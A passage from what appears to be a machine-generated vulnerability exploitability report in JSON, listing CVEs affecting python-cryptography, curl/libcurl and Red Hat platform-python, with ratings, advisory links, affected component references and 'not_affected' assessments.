          "url": "https://github.com/pyca/cryptography/security/advisories/GHSA-g6cj-pr64-35w5"
        }
      ],
      "published": "2026-08-03T22:16:52+00:00",
      "updated": "2026-08-04T15:16:43+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/cryptography@46.0.7",
          "versions": [
            {
              "version": "46.0.7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:pypi/cryptography@46.0.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-69248",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [],
      "cwes": [
        295
      ],
      "description": "cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Prior to 49.0.0, if an intermediate constrained CA permits the DNS name foo.example.com, and the leaf certificate has a wildcard in its DNS SAN of *.example.com, python-cryptography's verifier accepts which allows escaping outside of the permitted names. The core issue is in DNSConstraint::matches, where a wildcard pattern was treated as matching a more-specific permitted constraint even though *.example.com can expand to sibling names such as bar.example.com outside foo.example.com. This allows acceptance of an invalid certificate chain. This issue is fixed in 49.0.0.",
      "recommendation": "Upgrade cryptography to version 49.0.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-69248"
        },
        {
          "url": "https://github.com/pyca/cryptography"
        },
        {
          "url": "https://github.com/pyca/cryptography/commit/4d035a4225965edeffd312079a510ef25fcfdcb2"
        },
        {
          "url": "https://github.com/pyca/cryptography/pull/14888"
        },
        {
          "url": "https://github.com/pyca/cryptography/security/advisories/GHSA-m2h6-j472-rp4c"
        }
      ],
      "published": "2026-08-03T22:16:52+00:00",
      "updated": "2026-08-04T16:16:28+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/cryptography@46.0.7",
          "versions": [
            {
              "version": "46.0.7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:pypi/cryptography@46.0.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-69249",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [],
      "cwes": [
        400
      ],
      "description": "python-cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Prior to 49.0.0, when resolving invalid certificate chains that include duplicate copies of self-signed certificates, the processing recursively invokes the same candidate, leading to an exponential blowup. Although the limitation that the chain depth cannot exceed a specified maximum depth prevents unbounded recursion and guarantees termination, an attacker-controlled certificate chain can lead the processing to easily take more than 5s to reject in testing. This amplification could form the basis for a resource exhaustion denial of service attack. The core issue arises in the recursive nature of build_chain_inner, which does not de-duplicate against previously analyzed candidates. As the correctness of validation is not affected, the integrity of a system cannot be compromised through this vector, only its availability. This issue is fixed in 49.0.0.",
      "recommendation": "Upgrade cryptography to version 49.0.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-69249"
        },
        {
          "url": "https://github.com/pyca/cryptography"
        },
        {
          "url": "https://github.com/pyca/cryptography/commit/4a12cf49675a184e47f912b00b04f3a629283582"
        },
        {
          "url": "https://github.com/pyca/cryptography/pull/14960"
        },
        {
          "url": "https://github.com/pyca/cryptography/security/advisories/GHSA-jwv3-5hgf-82ww"
        }
      ],
      "published": "2026-08-03T22:16:52+00:00",
      "updated": "2026-08-04T15:16:43+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/cryptography@46.0.7",
          "versions": [
            {
              "version": "46.0.7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:pypi/cryptography@46.0.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-7168",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        294
      ],
      "description": "Successfully using libcurl to do a transfer over a specific HTTP proxy\n(`proxyA`) with **Digest** authentication and then changing the proxy host to\na second one (`proxyB`) for a second transfer, reusing the same handle, makes\nlibcurl wrongly pass on the `Proxy-Authorization:` header field meant for\n`proxyA`, to `proxyB`.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-7168"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/29/14"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-7168"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-7168.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-7168.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-v92m-hrhj-gw54"
        },
        {
          "url": "https://hackerone.com/reports/3697719"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7168"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8525-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-7168"
        }
      ],
      "published": "2026-05-13T13:01:57+00:00",
      "updated": "2026-06-17T11:01:57+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-7210",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        331
      ],
      "description": "`xml.parsers.expat` and `xml.etree.ElementTree` use insufficient entropy for Expat hash-flooding protection, which allows a crafted XML document to trigger hash flooding.\\r\\n\\r\\nFully mitigating this vulnerability requires both updating libexpat to 2.8.0 or later and applying this patch.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-7210"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/05/11/13"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/05/11/8"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-7210"
        },
        {
          "url": "https://github.com/python/cpython/commit/24b8f12544468e4cedf5bfbe25442fcd495391e4"
        },
        {
          "url": "https://github.com/python/cpython/commit/3573b3b1ecbd99030a0b18658e1bfece771b2566"
        },
        {
          "url": "https://github.com/python/cpython/commit/cbaecf9f16da611a646d507c1cbca265c588fc56"
        },
        {
          "url": "https://github.com/python/cpython/commit/e37df2a6a71d6538698e2d3188a7c345b827640b"
        },
        {
          "url": "https://github.com/python/cpython/commit/ea70712d1a8508e14e9677d44f838dab04dc0286"
        },
        {
          "url": "https://github.com/python/cpython/commit/eeea765cb9d8f1fc3d8918b272ac3c477983f27a"
        },
        {
          "url": "https://github.com/python/cpython/commit/fc9b11ff49cbc82e6f917d07a61517a2b5f3145f"
        },
        {
          "url": "https://github.com/python/cpython/issues/149018"
        },
        {
          "url": "https://github.com/python/cpython/pull/149023"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/PNY5OMBDPM2FRUZTWFFPJ6LISWKV627K/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7210"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-7210"
        }
      ],
      "published": "2026-05-11T18:16:42+00:00",
      "updated": "2026-08-14T01:19:08+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
